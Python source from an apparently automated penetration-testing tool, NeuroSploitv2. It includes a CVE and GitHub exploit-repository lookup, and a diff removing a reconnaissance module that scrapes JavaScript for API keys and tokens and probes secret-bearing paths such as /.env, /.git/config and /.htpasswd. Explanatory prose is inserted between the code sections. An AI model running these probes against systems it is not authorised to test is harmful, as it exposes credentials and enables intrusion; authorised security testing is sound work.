for wd in w.get("description", []):
if wd.get("value", "").startswith("CWE-"):
cwe_id = wd["value"]
break
if cwe_id:
break
# Affected version ranges from configurations
vparts: List[str] = []
for cfg in cve.get("configurations", []):
for node in cfg.get("nodes", []):
for cm in node.get("cpeMatch", []):
vs = cm.get("versionStartIncluding", "")
ve = cm.get("versionEndIncluding", "")
vee = cm.get("versionEndExcluding", "")
if vs and ve: vparts.append(f"{vs}-{ve}")
elif vs and vee: vparts.append(f"{vs}-<{vee}")
elif ve: vparts.append(f"<={ve}")
elif vee: vparts.append(f"<{vee}")
results.append(CVEResult(
cve_id=cve_id, cvss_score=cvss_score, severity=severity.upper(),
description=desc[:500], cwe_id=cwe_id,
affected_versions=", ".join(vparts[:5]),
published_date=cve.get("published", "")[:10],
))
results.sort(key=lambda c: c.cvss_score, reverse=True)
return results
# ── GitHub exploit search ─────────────────────────────────────────
async def search_github_exploits(self, cve_id: str) -> List[ExploitResult]:
"""Search GitHub for public exploit repos matching a CVE ID."""
session = await self._get_session()
params = {"q": cve_id, "sort": "stars", "order": "desc", "per_page": "10"}
hdrs = {"Accept": "application/vnd.github.v3+json"}
if self._github_token:
hdrs["Authorization"] = f"token {self._github_token}"
results: List[ExploitResult] = []
try:
async with session.get("https://api.github.com/search/repositories",
params=params, headers=hdrs) as resp:
if resp.status != 200:
logger.warning("GitHub search returned %d for %s", resp.status, cve_id)
return results
data = await resp.json(content_type=None)
except asyncio.TimeoutError:
logger.warning("GitHub search timed out for %s", cve_id)
return results
except Exception as exc:
logger.warning("GitHub search failed for %s: %s", cve_id, exc)
return results
for repo in data.get("items", []):
results.append(ExploitResult(
source="github", url=repo.get("html_url", ""),
description=(repo.get("description") or "")[:300],
stars=repo.get("stargazers_count", 0),
language=repo.get("language") or "Unknown",
))
results.sort(key=lambda e: e.stars, reverse=True)
return results
# ── Full pipeline ─────────────────────────────────────────────────
async def hunt(self, headers: Dict[str, str], body: str,
technologies: Optional[List[str]] = None) -> List[CVEFinding]:
"""
Full pipeline: extract versions -> NVD lookup -> GitHub exploit search.
Returns findings sorted by highest CVSS score descending.
"""
versions = await self.extract_versions(headers, body, technologies or [])
if not versions:
logger.info("No software versions detected; nothing to hunt.")
return []
logger.info("Detected %d software versions, searching CVEs...", len(versions))
findings: List[CVEFinding] = []
seen_cves: set[str] = set()
for vi in versions:
cves = await self.search_nvd(vi.software, vi.version)
unique = [c for c in cves if c.cve_id not in seen_cves]
seen_cves.update(c.cve_id for c in unique)
if not unique:
continue
exploits: List[ExploitResult] = []
for c in unique:
exploits.extend(await self.search_github_exploits(c.cve_id))
findings.append(CVEFinding(version_info=vi, cves=unique, exploits=exploits))
findings.sort(key=lambda f: max((c.cvss_score for c in f.cves), default=0.0),
reverse=True)
logger.info("CVE hunt complete: %d findings, %d CVEs, %d exploits",
len(findings), sum(len(f.cves) for f in findings),
sum(len(f.exploits) for f in findings))
return findings
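The NVD throttle in `_nvd_rate_limit` is a minimum-interval limiter: with 6 requests per minute it spaces calls 10 s apart, and with 50 per minute 1.2 s apart. A minimal standalone sketch of the same idea follows; `MinIntervalThrottle` and `timed_calls` are hypothetical names used only for this illustration.

```python
import asyncio
import time


class MinIntervalThrottle:
    """Space successive calls at least 60 / requests_per_minute seconds apart."""

    def __init__(self, requests_per_minute: int):
        self.min_interval = 60.0 / requests_per_minute
        self._last = 0.0  # monotonic timestamp of the previous call

    async def wait(self) -> None:
        elapsed = time.monotonic() - self._last
        if elapsed < self.min_interval:
            # Sleep only for the remaining part of the interval.
            await asyncio.sleep(self.min_interval - elapsed)
        self._last = time.monotonic()


async def timed_calls(throttle: MinIntervalThrottle, n: int) -> float:
    """Run n throttled no-op calls and return the total wall time in seconds."""
    start = time.monotonic()
    for _ in range(n):
        await throttle.wait()
    return time.monotonic() - start


if __name__ == "__main__":
    # 600 rpm gives a 0.1 s interval, so three calls take roughly 0.2 s.
    print(round(asyncio.run(timed_calls(MinIntervalThrottle(600), 3)), 2))
```

Because `hunt` awaits each NVD lookup in sequence, this kind of limiter is sufficient there; concurrent callers would additionally need a lock around the check-and-sleep step.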
-977
@@ -1,977 +0,0 @@
"""
Advanced reconnaissance module for NeuroSploitv2.
Performs deep JS analysis, sitemap/robots parsing, API enumeration,
source map parsing, framework-specific discovery, path fuzzing,
and technology fingerprinting using async HTTP requests.
"""
import re
import json
import asyncio
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urljoin, urlparse, parse_qs, urlencode
logger = logging.getLogger(__name__)
try:
import aiohttp
HAS_AIOHTTP = True
except ImportError:
HAS_AIOHTTP = False
try:
from xml.etree import ElementTree as ET
except ImportError:
ET = None
REQUEST_TIMEOUT = aiohttp.ClientTimeout(total=10) if HAS_AIOHTTP else None
MAX_JS_FILES = 30
MAX_JS_SIZE = 1024 * 1024 # 1 MB
MAX_SITEMAP_URLS = 500
MAX_SITEMAP_DEPTH = 3 # Recursive sitemap index depth
MAX_ENDPOINTS = 2000 # Global cap to prevent memory bloat
# --- Regex patterns for JS analysis ---
RE_API_ENDPOINT = re.compile(r'["\'](/api/v?\d*/[a-zA-Z0-9_/\-{}]+)["\']')
RE_RELATIVE_PATH = re.compile(r'["\'](/[a-zA-Z0-9_\-]+(?:/[a-zA-Z0-9_\-{}]+){1,6})["\']')
RE_FETCH_URL = re.compile(r'fetch\(\s*["\']([^"\']+)["\']')
RE_AXIOS_URL = re.compile(r'axios\.(?:get|post|put|patch|delete|request)\(\s*["\']([^"\']+)["\']')
RE_AJAX_URL = re.compile(r'\$\.ajax\(\s*\{[^}]*url\s*:\s*["\']([^"\']+)["\']', re.DOTALL)
RE_XHR_URL = re.compile(r'\.open\(\s*["\'][A-Z]+["\']\s*,\s*["\']([^"\']+)["\']')
RE_TEMPLATE_LITERAL = re.compile(r'`(/[a-zA-Z0-9_/\-]+\$\{[^}]+\}[a-zA-Z0-9_/\-]*)`')
RE_WINDOW_LOCATION = re.compile(r'(?:window\.location|location\.href)\s*=\s*["\']([^"\']+)["\']')
RE_FORM_ACTION = re.compile(r'action\s*[:=]\s*["\']([^"\']+)["\']')
RE_HREF_PATTERN = re.compile(r'href\s*[:=]\s*["\']([^"\']+)["\']')
RE_API_KEY = re.compile(
r'(?:sk-[a-zA-Z0-9]{20,}|pk_(?:live|test)_[a-zA-Z0-9]{20,}'
r'|AKIA[0-9A-Z]{16}'
r'|ghp_[a-zA-Z0-9]{36}'
r'|glpat-[a-zA-Z0-9\-]{20,}'
r'|eyJ[a-zA-Z0-9_-]{10,}\.[a-zA-Z0-9_-]{10,})'
)
RE_INTERNAL_URL = re.compile(
r'https?://(?:localhost|127\.0\.0\.1|10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+|172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)[^\s"\']*'
)
RE_REACT_ROUTE = re.compile(r'path\s*[:=]\s*["\'](/[^"\']*)["\']')
RE_ANGULAR_ROUTE = re.compile(r'path\s*:\s*["\']([^"\']+)["\']')
RE_VUE_ROUTE = re.compile(r'path\s*:\s*["\'](/[^"\']*)["\']')
RE_NEXTJS_PAGE = re.compile(r'"(/[a-zA-Z0-9_/\[\]\-]+)"')
# Source map patterns
RE_SOURCEMAP_URL = re.compile(r'//[#@]\s*sourceMappingURL\s*=\s*(\S+)')
RE_SOURCEMAP_ROUTES = re.compile(r'(?:pages|routes|views)/([a-zA-Z0-9_/\[\]\-]+)\.(?:tsx?|jsx?|vue|svelte)')
# GraphQL patterns
RE_GQL_QUERY = re.compile(r'(?:query|mutation|subscription)\s+(\w+)')
RE_GQL_FIELD = re.compile(r'gql\s*`[^`]*`', re.DOTALL)
# Parameter patterns in JS
RE_URL_PARAM = re.compile(r'[?&]([a-zA-Z0-9_]+)=')
RE_BODY_PARAM = re.compile(r'(?:body|data|params)\s*[:=]\s*\{([^}]+)\}', re.DOTALL)
RE_JSON_KEY = re.compile(r'["\']([a-zA-Z_][a-zA-Z0-9_]*)["\']')
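As a quick check of what two of these patterns match, the sketch below applies `RE_SOURCEMAP_ROUTES` and `RE_INTERNAL_URL` (copied from above) to invented inputs. The source-map paths and the JavaScript snippet are assumptions made for the example.

```python
import re

RE_SOURCEMAP_ROUTES = re.compile(
    r'(?:pages|routes|views)/([a-zA-Z0-9_/\[\]\-]+)\.(?:tsx?|jsx?|vue|svelte)')
RE_INTERNAL_URL = re.compile(
    r'https?://(?:localhost|127\.0\.0\.1|10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+'
    r'|172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)[^\s"\']*')

# Illustrative "sources" entries from a source map (made up).
sources = [
    "webpack:///./src/pages/users/[id].tsx",
    "webpack:///./src/components/Button.tsx",
]

routes = []
for src in sources:
    m = RE_SOURCEMAP_ROUTES.search(src)
    if m:
        # Bracketed path segments become {placeholders}, as in crawl_js_files.
        routes.append("/" + m.group(1).replace("[", "{").replace("]", "}"))

# Illustrative JavaScript snippet (made up).
js = 'const api = "http://10.0.3.7:8080/internal/v1"; fetch("https://cdn.example.com/app.js");'
internal = RE_INTERNAL_URL.findall(js)

print(routes)
print(internal)
```

Only files under `pages/`, `routes/` or `views/` produce routes, and only RFC 1918 and loopback hosts count as internal, so `172.15.x.x` is not matched.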
@dataclass
class JSAnalysisResult:
"""Results from JavaScript file analysis."""
endpoints: List[str] = field(default_factory=list)
api_keys: List[str] = field(default_factory=list)
internal_urls: List[str] = field(default_factory=list)
secrets: List[str] = field(default_factory=list)
parameters: Dict[str, List[str]] = field(default_factory=dict)
source_map_routes: List[str] = field(default_factory=list)
@dataclass
class APISchema:
"""Parsed API schema from Swagger/OpenAPI or GraphQL introspection."""
endpoints: List[Dict] = field(default_factory=list)
version: str = ""
source: str = ""
@dataclass
class EndpointInfo:
"""Rich endpoint descriptor with method and parameter hints."""
url: str
method: str = "GET"
params: List[str] = field(default_factory=list)
source: str = "" # How this endpoint was discovered
priority: int = 5 # 1-10, higher = more interesting
def _normalize_url(url: str) -> str:
"""Canonicalize a URL for deduplication."""
parsed = urlparse(url)
path = parsed.path.rstrip("/") or "/"
# Normalize double slashes
while "//" in path:
path = path.replace("//", "/")
# Sort query parameters
if parsed.query:
params = parse_qs(parsed.query, keep_blank_values=True)
sorted_query = urlencode(sorted(params.items()), doseq=True)
return f"{parsed.scheme}://{parsed.netloc}{path}?{sorted_query}"
return f"{parsed.scheme}://{parsed.netloc}{path}"
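The effect of this canonicalization is easiest to see on a few inputs. The sketch below restates the function under the name `normalize_url` so that it runs on its own; the example URLs are invented.

```python
from urllib.parse import parse_qs, urlencode, urlparse


def normalize_url(url: str) -> str:
    """Standalone restatement of _normalize_url for illustration."""
    parsed = urlparse(url)
    path = parsed.path.rstrip("/") or "/"
    while "//" in path:
        path = path.replace("//", "/")
    if parsed.query:
        params = parse_qs(parsed.query, keep_blank_values=True)
        query = urlencode(sorted(params.items()), doseq=True)
        return f"{parsed.scheme}://{parsed.netloc}{path}?{query}"
    return f"{parsed.scheme}://{parsed.netloc}{path}"


# Trailing slash, doubled slash and parameter order all collapse to one key.
a = normalize_url("https://example.com/api//users/?b=2&a=1")
b = normalize_url("https://example.com/api/users?a=1&b=2")

# An empty path becomes "/", and fragments are dropped.
root = normalize_url("https://example.com#top")

print(a, b, root)
```

The hostname is not case-folded and default ports are not stripped, so `https://Example.com/` and `https://example.com:443/` remain distinct keys under this scheme.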
class DeepRecon:
"""Advanced reconnaissance: JS analysis, sitemap, robots, API enum, fingerprinting."""
def __init__(self, session: Optional["aiohttp.ClientSession"] = None):
self._external_session = session is not None
self._session = session
self._seen_urls: Set[str] = set()
async def _get_session(self) -> "aiohttp.ClientSession":
if not HAS_AIOHTTP:
raise RuntimeError("aiohttp is required but not installed")
if self._session is None or self._session.closed:
self._session = aiohttp.ClientSession(timeout=REQUEST_TIMEOUT)
self._external_session = False
return self._session
async def close(self):
if not self._external_session and self._session and not self._session.closed:
await self._session.close()
async def _fetch(self, url: str, max_size: int = 0) -> Optional[str]:
"""Fetch URL text with optional size limit. Returns None on any error."""
try:
session = await self._get_session()
async with session.get(url, ssl=False, allow_redirects=True) as resp:
if resp.status != 200:
return None
if max_size:
chunk = await resp.content.read(max_size)
return chunk.decode("utf-8", errors="replace")
return await resp.text()
except Exception:
return None
async def _head_check(self, url: str) -> Optional[int]:
"""Quick HEAD request to check if a URL exists. Returns status or None."""
try:
session = await self._get_session()
async with session.head(url, ssl=False, allow_redirects=True, timeout=aiohttp.ClientTimeout(total=5)) as resp:
return resp.status
except Exception:
return None
async def _check_url_alive(self, url: str, accept_codes: Optional[Set[int]] = None) -> bool:
"""Check if URL returns an acceptable status code."""
if accept_codes is None:
accept_codes = {200, 201, 301, 302, 307, 308, 401, 403}
status = await self._head_check(url)
return status is not None and status in accept_codes
# ------------------------------------------------------------------
# JS file analysis (enhanced)
# ------------------------------------------------------------------
async def crawl_js_files(self, base_url: str, js_urls: List[str]) -> JSAnalysisResult:
"""Fetch and analyse JavaScript files for endpoints, keys, and secrets."""
result = JSAnalysisResult()
urls_to_scan = list(dict.fromkeys(js_urls))[:MAX_JS_FILES]
tasks = [self._fetch(urljoin(base_url, u), max_size=MAX_JS_SIZE) for u in urls_to_scan]
bodies = await asyncio.gather(*tasks, return_exceptions=True)
# Also try to fetch source maps in parallel
sourcemap_tasks = []
sourcemap_base_urls = []
for url, body in zip(urls_to_scan, bodies):
if not isinstance(body, str):
continue
sm = RE_SOURCEMAP_URL.search(body)
if sm:
sm_url = sm.group(1)
if not sm_url.startswith("data:"):
full_url = urljoin(urljoin(base_url, url), sm_url)
sourcemap_tasks.append(self._fetch(full_url, max_size=MAX_JS_SIZE * 2))
sourcemap_base_urls.append(full_url)
sourcemap_bodies = []
if sourcemap_tasks:
sourcemap_bodies = await asyncio.gather(*sourcemap_tasks, return_exceptions=True)
seen_endpoints: set = set()
seen_params: Dict[str, Set[str]] = {}
for body in bodies:
if not isinstance(body, str):
continue
self._extract_from_js(body, seen_endpoints, seen_params, result)
# Parse source maps for original file paths → route discovery
for sm_body in sourcemap_bodies:
if not isinstance(sm_body, str):
continue
try:
sm_data = json.loads(sm_body)
sources = sm_data.get("sources", [])
for src in sources:
m = RE_SOURCEMAP_ROUTES.search(src)
if m:
route = "/" + m.group(1).replace("[", "{").replace("]", "}")
result.source_map_routes.append(route)
seen_endpoints.add(route)
except (json.JSONDecodeError, ValueError):
# Not valid JSON source map — might still contain paths
for m in RE_SOURCEMAP_ROUTES.finditer(sm_body):
route = "/" + m.group(1).replace("[", "{").replace("]", "}")
result.source_map_routes.append(route)
seen_endpoints.add(route)
# Resolve endpoints relative to base_url
for ep in sorted(seen_endpoints):
if ep.startswith("http"):
resolved = ep
elif ep.startswith("/"):
resolved = urljoin(base_url, ep)
else:
continue
normalized = _normalize_url(resolved)
if normalized not in self._seen_urls:
self._seen_urls.add(normalized)
result.endpoints.append(resolved)
# Convert param sets
for endpoint, params in seen_params.items():
result.parameters[endpoint] = sorted(params)
return result
def _extract_from_js(
self, body: str, seen_endpoints: set, seen_params: Dict[str, Set[str]],
result: JSAnalysisResult,
):
"""Extract endpoints, params, keys, and internal URLs from a JS body."""
# API endpoint patterns (expanded)
for regex in (RE_API_ENDPOINT, RE_RELATIVE_PATH, RE_FETCH_URL, RE_AXIOS_URL,
RE_AJAX_URL, RE_XHR_URL, RE_TEMPLATE_LITERAL, RE_WINDOW_LOCATION,
RE_FORM_ACTION, RE_HREF_PATTERN):
for m in regex.finditer(body):
ep = m.group(1) if regex.groups else m.group(0)
# Filter out obvious non-endpoints
if self._is_valid_endpoint(ep):
seen_endpoints.add(ep)
# Route definitions (React Router, Angular, Vue Router, Next.js)
for regex in (RE_REACT_ROUTE, RE_ANGULAR_ROUTE, RE_VUE_ROUTE, RE_NEXTJS_PAGE):
for m in regex.finditer(body):
route = m.group(1)
if route.startswith("/") and len(route) < 200:
seen_endpoints.add(route)
# Extract URL parameters
for m in RE_URL_PARAM.finditer(body):
param_name = m.group(1)
# Find the URL this param belongs to (rough heuristic)
start = max(0, m.start() - 200)
context = body[start:m.start()]
for ep_regex in (RE_FETCH_URL, RE_API_ENDPOINT):
ep_match = ep_regex.search(context)
if ep_match:
ep = ep_match.group(1) if ep_regex.groups else ep_match.group(0)
if ep not in seen_params:
seen_params[ep] = set()
seen_params[ep].add(param_name)
# Extract JSON body parameters
for m in RE_BODY_PARAM.finditer(body):
block = m.group(1)
for key_m in RE_JSON_KEY.finditer(block):
key = key_m.group(1)
if len(key) <= 50 and not key.startswith("__"):
if "_body_params" not in seen_params:
seen_params["_body_params"] = set()
seen_params["_body_params"].add(key)
# API keys / tokens
for m in RE_API_KEY.finditer(body):
val = m.group(0)
if val not in result.api_keys:
result.api_keys.append(val)
result.secrets.append(val)
# Internal / private URLs
for m in RE_INTERNAL_URL.finditer(body):
val = m.group(0)
if val not in result.internal_urls:
result.internal_urls.append(val)
@staticmethod
def _is_valid_endpoint(ep: str) -> bool:
"""Filter out non-endpoint matches (CSS, images, data URIs, etc.)."""
if not ep or len(ep) > 500:
return False
if ep.startswith(("data:", "javascript:", "mailto:", "tel:", "#", "blob:")):
return False
# Skip common static assets
SKIP_EXT = ('.css', '.png', '.jpg', '.jpeg', '.gif', '.svg', '.ico', '.woff',
'.woff2', '.ttf', '.eot', '.mp4', '.mp3', '.webp', '.avif',
'.map', '.ts', '.tsx', '.jsx', '.scss', '.less', '.pdf')
lower = ep.lower()
if any(lower.endswith(ext) for ext in SKIP_EXT):
return False
# Must look like a path
if ep.startswith("/") or ep.startswith("http"):
return True
return False
# ------------------------------------------------------------------
# Sitemap parsing (enhanced with recursive index following)
# ------------------------------------------------------------------
async def parse_sitemap(self, target: str) -> List[str]:
"""Fetch and parse sitemap XML files for URLs. Follows sitemap indexes recursively."""
target = target.rstrip("/")
candidates = [
f"{target}/sitemap.xml",
f"{target}/sitemap_index.xml",
f"{target}/sitemap1.xml",
f"{target}/sitemap-index.xml",
f"{target}/sitemaps.xml",
f"{target}/post-sitemap.xml",
f"{target}/page-sitemap.xml",
f"{target}/category-sitemap.xml",
]
# Also check robots.txt for sitemap directives
robots_body = await self._fetch(f"{target}/robots.txt")
if robots_body:
for line in robots_body.splitlines():
line = line.strip()
if line.lower().startswith("sitemap:"):
sm_url = line.split(":", 1)[1].strip()
if sm_url and sm_url not in candidates:
candidates.append(sm_url)
urls: set = set()
visited_sitemaps: set = set()
async def _parse_one(sitemap_url: str, depth: int = 0):
if depth > MAX_SITEMAP_DEPTH or sitemap_url in visited_sitemaps:
return
if len(urls) >= MAX_SITEMAP_URLS:
return
visited_sitemaps.add(sitemap_url)
body = await self._fetch(sitemap_url)
if not body or ET is None:
return
try:
root = ET.fromstring(body)
except ET.ParseError:
return
sub_sitemaps = []
for elem in root.iter():
tag = elem.tag.split("}")[-1] if "}" in elem.tag else elem.tag
if tag == "loc" and elem.text:
loc = elem.text.strip()
# Check if this is a sub-sitemap
if loc.endswith(".xml") or "sitemap" in loc.lower():
sub_sitemaps.append(loc)
else:
urls.add(loc)
if len(urls) >= MAX_SITEMAP_URLS:
return
# Recursively follow sub-sitemaps
for sub in sub_sitemaps[:10]: # Limit sub-sitemap recursion
await _parse_one(sub, depth + 1)
# Parse all candidate sitemaps
for sitemap_url in candidates:
if len(urls) >= MAX_SITEMAP_URLS:
break
await _parse_one(sitemap_url)
return sorted(urls)[:MAX_SITEMAP_URLS]
# ------------------------------------------------------------------
# Robots.txt parsing (enhanced with Sitemap extraction)
# ------------------------------------------------------------------
async def parse_robots(self, target: str) -> Tuple[List[str], List[str]]:
"""Parse robots.txt. Returns (paths, sitemap_urls)."""
target = target.rstrip("/")
body = await self._fetch(f"{target}/robots.txt")
if not body:
return [], []
paths: set = set()
sitemaps: list = []
for line in body.splitlines():
line = line.strip()
if line.startswith("#") or ":" not in line:
continue
directive, _, value = line.partition(":")
directive = directive.strip().lower()
value = value.strip()
if directive in ("disallow", "allow") and value and value != "/":
resolved = urljoin(target + "/", value)
paths.add(resolved)
elif directive == "sitemap" and value:
sitemaps.append(value)
return sorted(paths), sitemaps
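The directive handling in `parse_robots` can be exercised without a network call. The sketch below applies the same line-by-line logic to an in-memory robots.txt; `parse_robots_text` is a hypothetical helper name and the file contents are invented.

```python
from typing import List, Tuple
from urllib.parse import urljoin


def parse_robots_text(target: str, body: str) -> Tuple[List[str], List[str]]:
    """Offline variant of parse_robots: returns (paths, sitemap_urls)."""
    target = target.rstrip("/")
    paths, sitemaps = set(), []
    for line in body.splitlines():
        line = line.strip()
        if line.startswith("#") or ":" not in line:
            continue
        # partition() splits on the first colon only, so URLs stay intact.
        directive, _, value = line.partition(":")
        directive, value = directive.strip().lower(), value.strip()
        if directive in ("disallow", "allow") and value and value != "/":
            paths.add(urljoin(target + "/", value))
        elif directive == "sitemap" and value:
            sitemaps.append(value)
    return sorted(paths), sitemaps


ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /
Allow: /public/page
# staging only
Sitemap: https://example.com/sitemap.xml
"""

paths, sitemaps = parse_robots_text("https://example.com/", ROBOTS)
print(paths, sitemaps)
```

A bare `Disallow: /` is skipped on purpose, since it adds no specific path to probe.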
# ------------------------------------------------------------------
# API enumeration (Swagger / OpenAPI / GraphQL / WADL / AsyncAPI)
# ------------------------------------------------------------------
_API_DOC_PATHS = [
"/swagger.json",
"/openapi.json",
"/api-docs",
"/v2/api-docs",
"/v3/api-docs",
"/swagger/v1/swagger.json",
"/swagger/v2/swagger.json",
"/.well-known/openapi",
"/api/swagger.json",
"/api/openapi.json",
"/api/v1/swagger.json",
"/api/v1/openapi.json",
"/api/docs",
"/docs/api",
"/doc.json",
"/public/swagger.json",
"/swagger-ui/swagger.json",
"/api-docs.json",
"/api/api-docs",
"/_api/docs",
]
_GRAPHQL_PATHS = [
"/graphql",
"/graphiql",
"/api/graphql",
"/v1/graphql",
"/gql",
"/query",
]
async def enumerate_api(self, target: str, technologies: List[str]) -> APISchema:
"""Discover and parse API documentation (OpenAPI/Swagger, GraphQL, WADL)."""
target = target.rstrip("/")
schema = APISchema()
# Try OpenAPI / Swagger endpoints (parallel batch)
api_tasks = [self._fetch(f"{target}{path}") for path in self._API_DOC_PATHS]
api_results = await asyncio.gather(*api_tasks, return_exceptions=True)
for path, body in zip(self._API_DOC_PATHS, api_results):
if not isinstance(body, str):
continue
try:
doc = json.loads(body)
except (json.JSONDecodeError, ValueError):
continue
if "paths" in doc or "openapi" in doc or "swagger" in doc:
schema.version = doc.get("openapi", doc.get("info", {}).get("version", ""))
schema.source = path
for route, methods in doc.get("paths", {}).items():
if not isinstance(methods, dict):
continue
for method, detail in methods.items():
if method.lower() in ("get", "post", "put", "patch", "delete", "options", "head"):
params = []
if isinstance(detail, dict):
for p in detail.get("parameters", []):
if isinstance(p, dict):
params.append(p.get("name", ""))
# Also extract request body schema params
req_body = detail.get("requestBody", {})
if isinstance(req_body, dict):
content = req_body.get("content", {})
for ct, ct_detail in content.items():
if isinstance(ct_detail, dict):
props = ct_detail.get("schema", {}).get("properties", {})
if isinstance(props, dict):
params.extend(props.keys())
schema.endpoints.append({
"url": route,
"method": method.upper(),
"params": [p for p in params if p],
})
logger.info(f"[DeepRecon] Found API schema at {path}: {len(schema.endpoints)} endpoints")
return schema
# GraphQL introspection (try multiple paths)
for gql_path in self._GRAPHQL_PATHS:
introspection = await self._graphql_introspect(f"{target}{gql_path}")
if introspection:
return introspection
return schema
async def _graphql_introspect(self, gql_url: str) -> Optional[APISchema]:
"""Attempt GraphQL introspection query at a specific URL."""
query = '{"query":"{ __schema { queryType { name } mutationType { name } types { name kind fields { name args { name type { name } } } } } }"}'
try:
session = await self._get_session()
headers = {"Content-Type": "application/json"}
async with session.post(
gql_url, data=query, headers=headers, ssl=False,
timeout=aiohttp.ClientTimeout(total=8),
) as resp:
if resp.status != 200:
return None
data = await resp.json()
except Exception:
return None
# Servers with introspection disabled often answer {"data": null, "errors": [...]}
if not isinstance(data, dict) or "__schema" not in (data.get("data") or {}):
return None
parsed_url = urlparse(gql_url)
source_path = parsed_url.path
schema = APISchema(version="graphql", source=source_path)
for type_info in data["data"]["__schema"].get("types", []):
type_name = type_info.get("name", "")
if type_name.startswith("__") or type_info.get("kind") in ("SCALAR", "ENUM", "INPUT_OBJECT"):
continue
for fld in type_info.get("fields", []) or []:
params = [a["name"] for a in fld.get("args", []) if isinstance(a, dict)]
schema.endpoints.append({
"url": f"/{type_name}/{fld['name']}",
"method": "QUERY",
"params": params,
})
return schema if schema.endpoints else None
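The way `_graphql_introspect` turns an introspection response into endpoint records can be sketched offline. `flatten_introspection` below is a hypothetical helper, and the response dict is a hand-written sample shaped like a reply to the `__schema` query, not output from a real server.

```python
from typing import Dict, List


def flatten_introspection(data: Dict) -> List[Dict]:
    """Map each field of each object type to a pseudo-endpoint record."""
    schema = (data.get("data") or {}).get("__schema") or {}
    endpoints = []
    for type_info in schema.get("types", []):
        name = type_info.get("name", "")
        # Skip introspection types and types that have no callable fields.
        if name.startswith("__") or type_info.get("kind") in ("SCALAR", "ENUM", "INPUT_OBJECT"):
            continue
        for fld in type_info.get("fields") or []:
            args = [a["name"] for a in (fld.get("args") or []) if isinstance(a, dict)]
            endpoints.append({"url": f"/{name}/{fld['name']}", "method": "QUERY", "params": args})
    return endpoints


# Hand-written sample response (assumption).
sample = {"data": {"__schema": {"types": [
    {"name": "Query", "kind": "OBJECT",
     "fields": [{"name": "user", "args": [{"name": "id", "type": {"name": "ID"}}]}]},
    {"name": "String", "kind": "SCALAR", "fields": None},
    {"name": "__Type", "kind": "OBJECT", "fields": [{"name": "name", "args": []}]},
]}}}

endpoints = flatten_introspection(sample)
disabled = flatten_introspection({"data": None, "errors": [{"message": "introspection disabled"}]})
print(endpoints, disabled)
```

The `/{type}/{field}` URLs are synthetic labels rather than real HTTP paths; every GraphQL operation still goes to the single endpoint that answered the introspection query.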
# ------------------------------------------------------------------
# Framework-specific endpoint discovery
# ------------------------------------------------------------------
_FRAMEWORK_PATHS: Dict[str, List[str]] = {
"wordpress": [
"/wp-admin/", "/wp-login.php", "/wp-json/wp/v2/posts",
"/wp-json/wp/v2/users", "/wp-json/wp/v2/pages",
"/wp-json/wp/v2/categories", "/wp-json/wp/v2/comments",
"/wp-json/wp/v2/media", "/wp-json/wp/v2/tags",
"/wp-json/", "/wp-content/uploads/",
"/wp-cron.php", "/xmlrpc.php", "/?rest_route=/wp/v2/users",
"/wp-admin/admin-ajax.php", "/wp-admin/load-scripts.php",
"/wp-includes/wlwmanifest.xml",
],
"laravel": [
"/api/user", "/api/login", "/api/register",
"/sanctum/csrf-cookie", "/telescope",
"/horizon", "/nova-api/", "/_debugbar/open",
"/storage/logs/laravel.log", "/env",
],
"django": [
"/admin/", "/admin/login/", "/api/",
"/__debug__/", "/static/admin/",
"/accounts/login/", "/accounts/signup/",
"/api/v1/", "/api/v2/",
],
"spring": [
"/actuator", "/actuator/health", "/actuator/env",
"/actuator/beans", "/actuator/mappings", "/actuator/info",
"/actuator/configprops", "/actuator/metrics",
"/swagger-ui.html", "/swagger-ui/index.html",
"/api-docs", "/v3/api-docs",
],
"express": [
"/api/", "/api/v1/", "/api/health",
"/api/status", "/auth/login", "/auth/register",
"/graphql",
],
"aspnet": [
"/_blazor", "/swagger", "/swagger/index.html",
"/api/values", "/api/health",
"/Identity/Account/Login", "/Identity/Account/Register",
],
"rails": [
"/rails/info", "/rails/mailers",
"/api/v1/", "/admin/",
"/users/sign_in", "/users/sign_up",
"/assets/application.js",
],
"nextjs": [
"/_next/data/", "/api/", "/api/auth/session",
"/api/auth/signin", "/api/auth/providers",
"/_next/static/chunks/",
],
"flask": [
"/api/", "/api/v1/", "/admin/",
"/static/", "/auth/login", "/auth/register",
"/swagger.json",
],
}
# Common hidden paths to check regardless of framework
_COMMON_HIDDEN_PATHS = [
"/.env", "/.git/config", "/.git/HEAD",
"/backup/", "/backups/", "/backup.sql", "/backup.zip",
"/config.json", "/config.yaml", "/config.yml",
"/debug/", "/debug/vars", "/debug/pprof",
"/internal/", "/internal/health", "/internal/status",
"/metrics", "/prometheus", "/health", "/healthz", "/ready",
"/status", "/ping", "/version", "/info",
"/.well-known/security.txt", "/security.txt",
"/crossdomain.xml", "/clientaccesspolicy.xml",
"/server-status", "/server-info",
"/phpinfo.php", "/info.php",
"/web.config", "/WEB-INF/web.xml",
"/console/", "/manage/", "/management/",
"/api/debug", "/api/config",
"/trace", "/jolokia/",
"/cgi-bin/", "/fcgi-bin/",
"/.htaccess", "/.htpasswd",
]
async def discover_framework_endpoints(
self, target: str, technologies: List[str]
) -> List[EndpointInfo]:
"""Probe framework-specific endpoints based on detected technologies."""
target = target.rstrip("/")
tech_lower = [t.lower() for t in technologies]
endpoints: List[EndpointInfo] = []
urls_to_check: List[Tuple[str, str, int]] = [] # (url, source, priority)
# Match frameworks by technology signatures
fw_matches = set()
for fw_name, keywords in {
"wordpress": ["wordpress", "wp-", "woocommerce"],
"laravel": ["laravel", "php", "lumen"],
"django": ["django", "python", "wagtail"],
"spring": ["spring", "java", "tomcat", "wildfly", "jetty"],
"express": ["express", "node", "koa", "fastify"],
"aspnet": ["asp.net", ".net", "blazor", "iis"],
"rails": ["ruby", "rails", "rack"],
"nextjs": ["next.js", "nextjs", "react", "vercel"],
"flask": ["flask", "python", "gunicorn", "werkzeug"],
}.items():
for kw in keywords:
for tech in tech_lower:
if kw in tech:
fw_matches.add(fw_name)
break
# Add framework-specific paths
for fw in fw_matches:
for path in self._FRAMEWORK_PATHS.get(fw, []):
urls_to_check.append((f"{target}{path}", f"framework:{fw}", 7))
# Always check common hidden paths
for path in self._COMMON_HIDDEN_PATHS:
